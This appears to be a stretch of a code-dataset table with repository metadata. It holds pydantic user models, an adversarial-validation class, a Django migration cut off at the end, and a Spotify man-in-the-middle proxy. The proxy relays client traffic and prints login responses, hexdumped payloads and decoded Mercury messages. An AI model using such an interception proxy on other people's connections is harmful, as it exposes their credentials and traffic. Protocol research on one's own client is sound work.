max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
fastproject/modules/users/models.py | jorge4larcon/fastproject | 12 | 6616651 | <reponame>jorge4larcon/fastproject<gh_stars>10-100
"""Models module."""
import datetime
import uuid
from typing import Any, Optional
import pydantic
from . import contypes, password_validators
class PublicUser(pydantic.BaseModel):
"""Represents user data that can be shared with the public."""
user_id: uuid.UUID
username: str
email: str
first_name: str
last_name: str
is_superuser: bool
is_staff: bool
is_active: bool
date_joined: datetime.datetime
last_login: Optional[datetime.datetime]
class PatchableUserData(pydantic.BaseModel):
"""
Represents user data that can be used to partially update a user in the
database.
"""
username: Optional[contypes.Username] = pydantic.Field(None, description="Username")
email: Optional[pydantic.EmailStr] = pydantic.Field(None, description="Email")
first_name: Optional[contypes.FirstName] = pydantic.Field(
None, description="First name"
)
last_name: Optional[contypes.LastName] = pydantic.Field(
None, description="Last name"
)
password: Optional[contypes.Password] = pydantic.Field(None, description="Password")
is_superuser: Optional[bool] = pydantic.Field(None, description="Is superuser?")
is_staff: Optional[bool] = pydantic.Field(None, description="Is staff?")
is_active: Optional[bool] = pydantic.Field(None, description="Is active?")
date_joined: Optional[datetime.datetime] = pydantic.Field(
None, description="Date joined"
)
last_login: Optional[datetime.datetime] = pydantic.Field(
None, description="Last login"
)
class UserRegistrationData(pydantic.BaseModel):
"""
Represents user data that can be used to register a user in the system and
insert that user in the database.
"""
username: contypes.Username = pydantic.Field(None, description="Username")
email: pydantic.EmailStr = pydantic.Field(None, description="Email")
first_name: contypes.FirstName = pydantic.Field(None, description="First name")
last_name: contypes.LastName = pydantic.Field(None, description="Last name")
password: contypes.Password = pydantic.Field(None, description="Password")
@pydantic.validator("password")
def validate_password(cls, value: str, values: dict[str, Any]) -> str:
"""Validates the password."""
user_attributes = {
"username": values["username"],
"email": values["email"],
"first_name": values["first_name"],
"last_name": values["last_name"],
}
return password_validators.validate_password(
value,
contypes.Password.min_length,
contypes.Password.max_length,
user_attributes,
)
| """Models module."""
import datetime
import uuid
from typing import Any, Optional
import pydantic
from . import contypes, password_validators
class PublicUser(pydantic.BaseModel):
"""Represents user data that can be shared with the public."""
user_id: uuid.UUID
username: str
email: str
first_name: str
last_name: str
is_superuser: bool
is_staff: bool
is_active: bool
date_joined: datetime.datetime
last_login: Optional[datetime.datetime]
class PatchableUserData(pydantic.BaseModel):
"""
Represents user data that can be used to partially update a user in the
database.
"""
username: Optional[contypes.Username] = pydantic.Field(None, description="Username")
email: Optional[pydantic.EmailStr] = pydantic.Field(None, description="Email")
first_name: Optional[contypes.FirstName] = pydantic.Field(
None, description="First name"
)
last_name: Optional[contypes.LastName] = pydantic.Field(
None, description="Last name"
)
password: Optional[contypes.Password] = pydantic.Field(None, description="Password")
is_superuser: Optional[bool] = pydantic.Field(None, description="Is superuser?")
is_staff: Optional[bool] = pydantic.Field(None, description="Is staff?")
is_active: Optional[bool] = pydantic.Field(None, description="Is active?")
date_joined: Optional[datetime.datetime] = pydantic.Field(
None, description="Date joined"
)
last_login: Optional[datetime.datetime] = pydantic.Field(
None, description="Last login"
)
class UserRegistrationData(pydantic.BaseModel):
"""
Represents user data that can be used to register a user in the system and
insert that user in the database.
"""
username: contypes.Username = pydantic.Field(None, description="Username")
email: pydantic.EmailStr = pydantic.Field(None, description="Email")
first_name: contypes.FirstName = pydantic.Field(None, description="First name")
last_name: contypes.LastName = pydantic.Field(None, description="Last name")
password: contypes.Password = pydantic.Field(None, description="Password")
@pydantic.validator("password")
def validate_password(cls, value: str, values: dict[str, Any]) -> str:
"""Validates the password."""
user_attributes = {
"username": values["username"],
"email": values["email"],
"first_name": values["first_name"],
"last_name": values["last_name"],
}
return password_validators.validate_password(
value,
contypes.Password.min_length,
contypes.Password.max_length,
user_attributes,
) | en | 0.898555 | Models module. Represents user data that can be shared with the public. Represents user data that can be used to partially update a user in the database. Represents user data that can be used to register a user in the system and insert that user in the database. Validates the password. | 2.979633 | 3 |
proxy.py | kingosticks/spotify-mitm-proxy | 4 | 6616652 | from network import Connection
from mercury import MercuryParser
from commands import SpotifyCommand
import hexdump
import os
import zlib
import json
import proto
PRODINFO_FILENAME = 'prodinfo.xml'
class DownstreamConnection(Connection):
def __init__(self, codec):
super(DownstreamConnection, self).__init__(codec, 'downstream')
self.mercury_parser = MercuryParser()
self.final = True
self.handlers.update({
SpotifyCommand.LOGIN: (self.login, proto.ClientResponseEncrypted),
SpotifyCommand.LOG: (self.log, None),
SpotifyCommand.PONG: (self.pong, None),
SpotifyCommand.CLIENT_HASH: (self.client_hash, None),
# used in 0.8.8 client
SpotifyCommand.UNK_1: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_2: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_4: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_5: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_6: (self.passthrough_from_downstream, None),
SpotifyCommand.BROWSE: (self.passthrough_from_downstream, None),
SpotifyCommand.SEARCH: (self.passthrough_from_downstream, None),
SpotifyCommand.GET_PLAYLIST: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANGE_PLAYLIST: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_7: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_8: (self.passthrough_from_downstream, None),
SpotifyCommand.P2P_SETUP: (self.passthrough_from_downstream, None),
# used in 0.9.17 client
SpotifyCommand.UNK_3: (self.passthrough_from_downstream, None),
SpotifyCommand.PLAYLIST_UNK: (self.passthrough_from_downstream, None),
SpotifyCommand.IMAGE: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_SUBSTREAM: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_ABORT: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_DATA: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_ERROR: (self.passthrough_from_downstream, None),
SpotifyCommand.TOKEN_NOTIFY: (self.passthrough_from_downstream, None),
SpotifyCommand.KEY_REQUEST: (self.passthrough_from_downstream, None),
SpotifyCommand.REQUEST_PLAY: (self.passthrough_from_downstream, None),
# SpotifyCommand.MERCURY_REQUEST: (self.passthrough_from_downstream_quiet, None),
# SpotifyCommand.MERCURY_SUB: (self.passthrough_from_downstream_quiet, None),
# SpotifyCommand.MERCURY_UNSUB: (self.passthrough_from_downstream_quiet, None),
SpotifyCommand.MERCURY_REQUEST: (self.handle_mercury_downstream, None),
SpotifyCommand.MERCURY_SUB: (self.handle_mercury_downstream, None),
SpotifyCommand.MERCURY_UNSUB: (self.handle_mercury_downstream, None),
})
def passthrough_from_downstream_quiet(self, cmd, data):
print 'received command %r len %d downstream' % (cmd, len(data))
self.remote.send_queue.put((cmd, data))
def passthrough_from_downstream(self, cmd, data):
print 'received command %r len %d downstream' % (cmd, len(data))
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def pong(self, cmd, pong_data):
print 'Received pong'
self.remote.send_queue.put((cmd, pong_data))
def log(self, cmd, log_info):
# print 'Received log event'
# hexdump.hexdump(log_info)
# self.remote.send_queue.put((cmd, log_info))
pass
def client_hash(self, cmd, client_hash):
print 'received client hash downstream'
hexdump.hexdump(client_hash)
self.remote.send_queue.put((cmd, client_hash))
def handle_mercury_downstream(self, cmd, payload):
seq, flags, count, data = self.mercury_parser.parse_header(payload[:])
if flags == 1:
# final
self.final = True
else:
print '!!! not final flag'
self.final = False
seq, frames = self.mercury_parser.parse_packet(payload[:])
print 'had mercury cmd %r downstream' % cmd
# print 'seq %s, |frames| = %d' % (seq.encode('hex'), len(frames))
request = proto.Header()
request.ParseFromString(frames[0])
print 'request was'
print request
payloads = frames[1:]
# assert len(payloads) <= 1
if payloads:
mercury_payload = payloads[0]
else:
mercury_payload = None
if cmd == 0xb3:
method = 'SUB'
elif cmd == 0xb4:
method = 'UNSUB'
else:
method = request.method
if mercury_payload:
hexdump.hexdump(mercury_payload)
if request.uri == 'hm://event-service/v1/events':
if '127.0.0.1' in mercury_payload:
print '** warning: ignoring mercury request to %s' % request.uri
return
# if 'hm://pusher' in request.uri or 'hm://identity/' in request.uri:
# print '** warning: ignoring mercury request to %s' % request.uri
# return
# send it off
# TODO: pass in callback which sends data back to client after inspection
# self.mercury.request(method, request.uri, mercury_payload, mime=request.content_type)
self.remote.send_queue.put((cmd, payload))
def login(self, cmd, client_response_encrypted):
print 'downstream attempted to login with:'
print client_response_encrypted
self.remote.send_queue.put((cmd, client_response_encrypted.SerializeToString()))
class UpstreamConnection(Connection):
def __init__(self, codec):
super(UpstreamConnection, self).__init__(codec, 'upstream')
self.mercury_parser = MercuryParser()
self.final = True
self.handlers.update({
SpotifyCommand.PING: (self.ping, None),
SpotifyCommand.PONG_ACK: (self.pongack, None),
SpotifyCommand.LOGIN_SUCCESS: (self.login_success, proto.APWelcome),
SpotifyCommand.LOGIN_FAILURE: (self.passthrough_from_upstream, None),
SpotifyCommand.WELCOME: (self.passthrough_from_upstream, None),
SpotifyCommand.UNK_ZEROES: (self.unk_for_auth, None),
SpotifyCommand.UNK_0: (self.passthrough_from_upstream, None),
# from 0.8.8 client
SpotifyCommand.P2P_INITBLK: (self.passthrough_from_upstream, None),
# used in 0.9.17 client
SpotifyCommand.CHANNEL_ABORT: (self.passthrough_from_upstream, None),
SpotifyCommand.CHANNEL_DATA: (self.passthrough_from_upstream, None),
SpotifyCommand.CHANNEL_ERROR: (self.passthrough_from_upstream, None),
SpotifyCommand.KEY_AES_DATA: (self.passthrough_from_upstream, None),
SpotifyCommand.KEY_AES_ERROR: (self.passthrough_from_upstream, None),
SpotifyCommand.SHA_HASH: (self.passthrough_from_upstream, None),
SpotifyCommand.PRODINFO: (self.handle_prodinfo, None),
SpotifyCommand.SECRET_BLK: (self.handle_secret_blk, None),
SpotifyCommand.COUNTRY_CODE: (self.handle_country_code, None),
# SpotifyCommand.MERCURY_REQUEST: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_SUB: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_UNSUB: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_NOTIFY: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_CB: (self.passthrough_from_upstream_quiet, None),
SpotifyCommand.MERCURY_REQUEST: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_SUB: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_UNSUB: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_NOTIFY: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_CB: (self.handle_mercury_upstream, None),
})
def login_success(self, cmd, resp):
print 'upstream reports login success!'
print resp
self.remote.send_queue.put((cmd, resp.SerializeToString()))
def passthrough_from_upstream_quiet(self, cmd, data):
print 'received command %r len %d upstream' % (cmd, len(data))
self.remote.send_queue.put((cmd, data))
def passthrough_from_upstream(self, cmd, data):
print 'received command %r len %d upstream' % (cmd, len(data))
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def unk_for_auth(self, cmd, data):
print 'received weird auth cmd %r upstream' % cmd
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def handle_prodinfo(self, cmd, prodxml):
if not os.path.exists(PRODINFO_FILENAME):
print 'saving prodinfo to', PRODINFO_FILENAME
with open(PRODINFO_FILENAME, 'wb') as f:
f.write(prodxml)
else:
print 'using prodinfo data from', PRODINFO_FILENAME
with open(PRODINFO_FILENAME, 'rb') as f:
prodxml = f.read()
self.remote.send_queue.put((cmd, prodxml))
def handle_country_code(self, cmd, country_code):
print 'received country code', country_code, 'from upstream'
self.remote.send_queue.put((cmd, country_code))
def handle_secret_blk(self, cmd, secret_data):
print 'received secret block upstream'
self.remote.send_queue.put((cmd, secret_data))
# client uses this to sign their offline key
# secret_data[16:16 + 128] is rsa public exponent
# secret_data[16 + 128:] is 144 byte rsa signature?
# see despotify/src/lib/handlers.c - handle_secret_block()
def ping(self, cmd, ping_data):
print 'received ping from upstream'
self.remote.send_queue.put((cmd, ping_data))
def pongack(self, cmd, pong_ack_data):
print 'received pong-ack from upstream'
self.remote.send_queue.put((cmd, pong_ack_data))
def handle_mercury_upstream(self, cmd, payload):
# seq, flags, count, data = self.mercury_parser.parse_header(payload[:])
seq, frames = self.mercury_parser.parse_packet(payload[:])
if frames is None:
print 'received incomplete mercury response with cmd %r upstream' % cmd
self.remote.send_queue.put((cmd, payload))
return
print 'received complete mercury response with cmd %r upstream' % cmd
response = proto.Header()
response.ParseFromString(frames[0])
# if response.uri.startswith('hm://pusher/v1/connections/') or response.uri.startswith('hm://identity/v1/user/'):
# print '** skipping'
# print 'remaining frames are:', frames
# return
# split_uri = response.uri.split('/')
# prefix = split_uri[:-1]
# dest_b64 = split_uri[-1]
# pusher_decoded = base64.b64decode(dest_b64)
# pusher_fields = pusher_decoded.split('+')
# # first field is device_id from login request
# # second is AP
# # third is 'tcp://gae2-accesspoint-b-mzf1.gae2.spotify.net:5026'
# # last is some hash (probably sha256 of something)
# pusher_fields[2] = 'tcp://'
print response
if len(frames[1:]) > 0:
# print payload if we have it here
for payload_frame in frames[1:]:
kv = {}
for user_field in response.user_fields:
kv[user_field.key.lower()] = user_field.value
if 'content-encoding' in kv:
if kv['content-encoding'] == 'gzip':
# decode response first
payload_frame = zlib.decompress(payload_frame, 16+zlib.MAX_WBITS)
if 'application/json' in response.content_type:
j = json.loads(payload_frame)
print json.dumps(j, indent=2)
else:
hexdump.hexdump(payload_frame)
self.remote.send_queue.put((cmd, payload)) | from network import Connection
from mercury import MercuryParser
from commands import SpotifyCommand
import hexdump
import os
import zlib
import json
import proto
PRODINFO_FILENAME = 'prodinfo.xml'
class DownstreamConnection(Connection):
def __init__(self, codec):
super(DownstreamConnection, self).__init__(codec, 'downstream')
self.mercury_parser = MercuryParser()
self.final = True
self.handlers.update({
SpotifyCommand.LOGIN: (self.login, proto.ClientResponseEncrypted),
SpotifyCommand.LOG: (self.log, None),
SpotifyCommand.PONG: (self.pong, None),
SpotifyCommand.CLIENT_HASH: (self.client_hash, None),
# used in 0.8.8 client
SpotifyCommand.UNK_1: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_2: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_4: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_5: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_6: (self.passthrough_from_downstream, None),
SpotifyCommand.BROWSE: (self.passthrough_from_downstream, None),
SpotifyCommand.SEARCH: (self.passthrough_from_downstream, None),
SpotifyCommand.GET_PLAYLIST: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANGE_PLAYLIST: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_7: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_8: (self.passthrough_from_downstream, None),
SpotifyCommand.P2P_SETUP: (self.passthrough_from_downstream, None),
# used in 0.9.17 client
SpotifyCommand.UNK_3: (self.passthrough_from_downstream, None),
SpotifyCommand.PLAYLIST_UNK: (self.passthrough_from_downstream, None),
SpotifyCommand.IMAGE: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_SUBSTREAM: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_ABORT: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_DATA: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_ERROR: (self.passthrough_from_downstream, None),
SpotifyCommand.TOKEN_NOTIFY: (self.passthrough_from_downstream, None),
SpotifyCommand.KEY_REQUEST: (self.passthrough_from_downstream, None),
SpotifyCommand.REQUEST_PLAY: (self.passthrough_from_downstream, None),
# SpotifyCommand.MERCURY_REQUEST: (self.passthrough_from_downstream_quiet, None),
# SpotifyCommand.MERCURY_SUB: (self.passthrough_from_downstream_quiet, None),
# SpotifyCommand.MERCURY_UNSUB: (self.passthrough_from_downstream_quiet, None),
SpotifyCommand.MERCURY_REQUEST: (self.handle_mercury_downstream, None),
SpotifyCommand.MERCURY_SUB: (self.handle_mercury_downstream, None),
SpotifyCommand.MERCURY_UNSUB: (self.handle_mercury_downstream, None),
})
def passthrough_from_downstream_quiet(self, cmd, data):
print 'received command %r len %d downstream' % (cmd, len(data))
self.remote.send_queue.put((cmd, data))
def passthrough_from_downstream(self, cmd, data):
print 'received command %r len %d downstream' % (cmd, len(data))
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def pong(self, cmd, pong_data):
print 'Received pong'
self.remote.send_queue.put((cmd, pong_data))
def log(self, cmd, log_info):
# print 'Received log event'
# hexdump.hexdump(log_info)
# self.remote.send_queue.put((cmd, log_info))
pass
def client_hash(self, cmd, client_hash):
print 'received client hash downstream'
hexdump.hexdump(client_hash)
self.remote.send_queue.put((cmd, client_hash))
def handle_mercury_downstream(self, cmd, payload):
seq, flags, count, data = self.mercury_parser.parse_header(payload[:])
if flags == 1:
# final
self.final = True
else:
print '!!! not final flag'
self.final = False
seq, frames = self.mercury_parser.parse_packet(payload[:])
print 'had mercury cmd %r downstream' % cmd
# print 'seq %s, |frames| = %d' % (seq.encode('hex'), len(frames))
request = proto.Header()
request.ParseFromString(frames[0])
print 'request was'
print request
payloads = frames[1:]
# assert len(payloads) <= 1
if payloads:
mercury_payload = payloads[0]
else:
mercury_payload = None
if cmd == 0xb3:
method = 'SUB'
elif cmd == 0xb4:
method = 'UNSUB'
else:
method = request.method
if mercury_payload:
hexdump.hexdump(mercury_payload)
if request.uri == 'hm://event-service/v1/events':
if '127.0.0.1' in mercury_payload:
print '** warning: ignoring mercury request to %s' % request.uri
return
# if 'hm://pusher' in request.uri or 'hm://identity/' in request.uri:
# print '** warning: ignoring mercury request to %s' % request.uri
# return
# send it off
# TODO: pass in callback which sends data back to client after inspection
# self.mercury.request(method, request.uri, mercury_payload, mime=request.content_type)
self.remote.send_queue.put((cmd, payload))
def login(self, cmd, client_response_encrypted):
print 'downstream attempted to login with:'
print client_response_encrypted
self.remote.send_queue.put((cmd, client_response_encrypted.SerializeToString()))
class UpstreamConnection(Connection):
def __init__(self, codec):
super(UpstreamConnection, self).__init__(codec, 'upstream')
self.mercury_parser = MercuryParser()
self.final = True
self.handlers.update({
SpotifyCommand.PING: (self.ping, None),
SpotifyCommand.PONG_ACK: (self.pongack, None),
SpotifyCommand.LOGIN_SUCCESS: (self.login_success, proto.APWelcome),
SpotifyCommand.LOGIN_FAILURE: (self.passthrough_from_upstream, None),
SpotifyCommand.WELCOME: (self.passthrough_from_upstream, None),
SpotifyCommand.UNK_ZEROES: (self.unk_for_auth, None),
SpotifyCommand.UNK_0: (self.passthrough_from_upstream, None),
# from 0.8.8 client
SpotifyCommand.P2P_INITBLK: (self.passthrough_from_upstream, None),
# used in 0.9.17 client
SpotifyCommand.CHANNEL_ABORT: (self.passthrough_from_upstream, None),
SpotifyCommand.CHANNEL_DATA: (self.passthrough_from_upstream, None),
SpotifyCommand.CHANNEL_ERROR: (self.passthrough_from_upstream, None),
SpotifyCommand.KEY_AES_DATA: (self.passthrough_from_upstream, None),
SpotifyCommand.KEY_AES_ERROR: (self.passthrough_from_upstream, None),
SpotifyCommand.SHA_HASH: (self.passthrough_from_upstream, None),
SpotifyCommand.PRODINFO: (self.handle_prodinfo, None),
SpotifyCommand.SECRET_BLK: (self.handle_secret_blk, None),
SpotifyCommand.COUNTRY_CODE: (self.handle_country_code, None),
# SpotifyCommand.MERCURY_REQUEST: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_SUB: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_UNSUB: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_NOTIFY: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_CB: (self.passthrough_from_upstream_quiet, None),
SpotifyCommand.MERCURY_REQUEST: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_SUB: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_UNSUB: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_NOTIFY: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_CB: (self.handle_mercury_upstream, None),
})
def login_success(self, cmd, resp):
print 'upstream reports login success!'
print resp
self.remote.send_queue.put((cmd, resp.SerializeToString()))
def passthrough_from_upstream_quiet(self, cmd, data):
print 'received command %r len %d upstream' % (cmd, len(data))
self.remote.send_queue.put((cmd, data))
def passthrough_from_upstream(self, cmd, data):
print 'received command %r len %d upstream' % (cmd, len(data))
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def unk_for_auth(self, cmd, data):
print 'received weird auth cmd %r upstream' % cmd
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def handle_prodinfo(self, cmd, prodxml):
if not os.path.exists(PRODINFO_FILENAME):
print 'saving prodinfo to', PRODINFO_FILENAME
with open(PRODINFO_FILENAME, 'wb') as f:
f.write(prodxml)
else:
print 'using prodinfo data from', PRODINFO_FILENAME
with open(PRODINFO_FILENAME, 'rb') as f:
prodxml = f.read()
self.remote.send_queue.put((cmd, prodxml))
def handle_country_code(self, cmd, country_code):
print 'received country code', country_code, 'from upstream'
self.remote.send_queue.put((cmd, country_code))
def handle_secret_blk(self, cmd, secret_data):
print 'received secret block upstream'
self.remote.send_queue.put((cmd, secret_data))
# client uses this to sign their offline key
# secret_data[16:16 + 128] is rsa public exponent
# secret_data[16 + 128:] is 144 byte rsa signature?
# see despotify/src/lib/handlers.c - handle_secret_block()
def ping(self, cmd, ping_data):
print 'received ping from upstream'
self.remote.send_queue.put((cmd, ping_data))
def pongack(self, cmd, pong_ack_data):
print 'received pong-ack from upstream'
self.remote.send_queue.put((cmd, pong_ack_data))
def handle_mercury_upstream(self, cmd, payload):
# seq, flags, count, data = self.mercury_parser.parse_header(payload[:])
seq, frames = self.mercury_parser.parse_packet(payload[:])
if frames is None:
print 'received incomplete mercury response with cmd %r upstream' % cmd
self.remote.send_queue.put((cmd, payload))
return
print 'received complete mercury response with cmd %r upstream' % cmd
response = proto.Header()
response.ParseFromString(frames[0])
# if response.uri.startswith('hm://pusher/v1/connections/') or response.uri.startswith('hm://identity/v1/user/'):
# print '** skipping'
# print 'remaining frames are:', frames
# return
# split_uri = response.uri.split('/')
# prefix = split_uri[:-1]
# dest_b64 = split_uri[-1]
# pusher_decoded = base64.b64decode(dest_b64)
# pusher_fields = pusher_decoded.split('+')
# # first field is device_id from login request
# # second is AP
# # third is 'tcp://gae2-accesspoint-b-mzf1.gae2.spotify.net:5026'
# # last is some hash (probably sha256 of something)
# pusher_fields[2] = 'tcp://'
print response
if len(frames[1:]) > 0:
# print payload if we have it here
for payload_frame in frames[1:]:
kv = {}
for user_field in response.user_fields:
kv[user_field.key.lower()] = user_field.value
if 'content-encoding' in kv:
if kv['content-encoding'] == 'gzip':
# decode response first
payload_frame = zlib.decompress(payload_frame, 16+zlib.MAX_WBITS)
if 'application/json' in response.content_type:
j = json.loads(payload_frame)
print json.dumps(j, indent=2)
else:
hexdump.hexdump(payload_frame)
self.remote.send_queue.put((cmd, payload)) | en | 0.576894 | # used in 0.8.8 client # used in 0.9.17 client # SpotifyCommand.MERCURY_REQUEST: (self.passthrough_from_downstream_quiet, None), # SpotifyCommand.MERCURY_SUB: (self.passthrough_from_downstream_quiet, None), # SpotifyCommand.MERCURY_UNSUB: (self.passthrough_from_downstream_quiet, None), # print 'Received log event' # hexdump.hexdump(log_info) # self.remote.send_queue.put((cmd, log_info)) # final # print 'seq %s, |frames| = %d' % (seq.encode('hex'), len(frames)) # assert len(payloads) <= 1 # if 'hm://pusher' in request.uri or 'hm://identity/' in request.uri: # print '** warning: ignoring mercury request to %s' % request.uri # return # send it off # TODO: pass in callback which sends data back to client after inspection # self.mercury.request(method, request.uri, mercury_payload, mime=request.content_type) # from 0.8.8 client # used in 0.9.17 client # SpotifyCommand.MERCURY_REQUEST: (self.passthrough_from_upstream_quiet, None), # SpotifyCommand.MERCURY_SUB: (self.passthrough_from_upstream_quiet, None), # SpotifyCommand.MERCURY_UNSUB: (self.passthrough_from_upstream_quiet, None), # SpotifyCommand.MERCURY_NOTIFY: (self.passthrough_from_upstream_quiet, None), # SpotifyCommand.MERCURY_CB: (self.passthrough_from_upstream_quiet, None), # client uses this to sign their offline key # secret_data[16:16 + 128] is rsa public exponent # secret_data[16 + 128:] is 144 byte rsa signature? # see despotify/src/lib/handlers.c - handle_secret_block() # seq, flags, count, data = self.mercury_parser.parse_header(payload[:]) # if response.uri.startswith('hm://pusher/v1/connections/') or response.uri.startswith('hm://identity/v1/user/'): # print '** skipping' # print 'remaining frames are:', frames # return # split_uri = response.uri.split('/') # prefix = split_uri[:-1] # dest_b64 = split_uri[-1] # pusher_decoded = base64.b64decode(dest_b64) # pusher_fields = pusher_decoded.split('+') # # first field is device_id from login request # # second is AP # # third is 'tcp://gae2-accesspoint-b-mzf1.gae2.spotify.net:5026' # # last is some hash (probably sha256 of something) # pusher_fields[2] = 'tcp://' # print payload if we have it here # decode response first | 2.328528 | 2 |
validation/adval.py | alikula314/adval | 1 | 6616653 | <gh_stars>1-10
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
import xgboost as xgb
from xgboost import cv
class adVala:
def __init__(self, train, test, similarity_ratio ,target, id):
self.train = train
self.test = test
self.target = target
self.id =id
self.similarity_ratio = similarity_ratio
def auc_score(self):
train = self.train.drop(columns=[self.target, self.id], errors='ignore')
test = self.test.drop(columns=[self.target , self.id], errors='ignore')
X_test = test.select_dtypes(include=['number']).copy()
X_train = train.select_dtypes(include=['number']).copy()
# add the train/test labels
X_train["AV_label"] = 0
X_test["AV_label"] = 1
# make one big dataset
all_data = pd.concat([X_train, X_test], axis=0, ignore_index=True)
# shuffle
all_data_shuffled = all_data.sample(frac=1)
# create our DMatrix (the XGBoost data structure)
X = all_data_shuffled.drop(['AV_label'], axis=1)
y = all_data_shuffled['AV_label']
XGBdata = xgb.DMatrix(data=X,label=y)
# our XGBoost parameters
params = {"objective":"binary:logistic",
"eval_metric":"logloss",
'learning_rate': 0.05,
'max_depth': 6, }
# perform cross validation with XGBoost
cross_val_results = cv(dtrain=XGBdata, params=params,
nfold=5, metrics="auc",
num_boost_round=200,early_stopping_rounds=20,
as_pandas=True)
# print out the final result
score = (cross_val_results["test-auc-mean"]).iloc[-1]
sc = 100 - ((score - 0.5) * 200 )
sr = self.similarity_ratio
if sc >= sr:
print("Train and test data are similar, Similarity Ratio: ½{:.4}".format(sc))
else:
print("Train and test data are not similar, Similarity Ratio: ½{:.4}".format(sc))
| import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
import xgboost as xgb
from xgboost import cv
class adVala:
def __init__(self, train, test, similarity_ratio ,target, id):
self.train = train
self.test = test
self.target = target
self.id =id
self.similarity_ratio = similarity_ratio
def auc_score(self):
train = self.train.drop(columns=[self.target, self.id], errors='ignore')
test = self.test.drop(columns=[self.target , self.id], errors='ignore')
X_test = test.select_dtypes(include=['number']).copy()
X_train = train.select_dtypes(include=['number']).copy()
# add the train/test labels
X_train["AV_label"] = 0
X_test["AV_label"] = 1
# make one big dataset
all_data = pd.concat([X_train, X_test], axis=0, ignore_index=True)
# shuffle
all_data_shuffled = all_data.sample(frac=1)
# create our DMatrix (the XGBoost data structure)
X = all_data_shuffled.drop(['AV_label'], axis=1)
y = all_data_shuffled['AV_label']
XGBdata = xgb.DMatrix(data=X,label=y)
# our XGBoost parameters
params = {"objective":"binary:logistic",
"eval_metric":"logloss",
'learning_rate': 0.05,
'max_depth': 6, }
# perform cross validation with XGBoost
cross_val_results = cv(dtrain=XGBdata, params=params,
nfold=5, metrics="auc",
num_boost_round=200,early_stopping_rounds=20,
as_pandas=True)
# print out the final result
score = (cross_val_results["test-auc-mean"]).iloc[-1]
sc = 100 - ((score - 0.5) * 200 )
sr = self.similarity_ratio
if sc >= sr:
print("Train and test data are similar, Similarity Ratio: ½{:.4}".format(sc))
else:
print("Train and test data are not similar, Similarity Ratio: ½{:.4}".format(sc)) | en | 0.553281 | # add the train/test labels # make one big dataset # shuffle # create our DMatrix (the XGBoost data structure) # our XGBoost parameters # perform cross validation with XGBoost # print out the final result | 2.893011 | 3 |
hello/migrations/0016_auto_20210123_1614.py | StafaH/jamm-bandit | 2 | 6616654 | <filename>hello/migrations/0016_auto_20210123_1614.py
# Generated by Django 3.1.4 on 2021-01-23 16:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hello', '0015_duelrecord_second_arm_wins'),
]
operations = [
migrations.AlterField(
model_name='duelrecord',
name='first_arm',
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name='duelrecord',
name='second_arm',
field=models.IntegerField(db_index=True),
),
]
| <filename>hello/migrations/0016_auto_20210123_1614.py
# Generated by Django 3.1.4 on 2021-01-23 16:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hello', '0015_duelrecord_second_arm_wins'),
]
operations = [
migrations.AlterField(
model_name='duelrecord',
name='first_arm',
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name='duelrecord',
name='second_arm',
field=models.IntegerField(db_index=True),
),
]
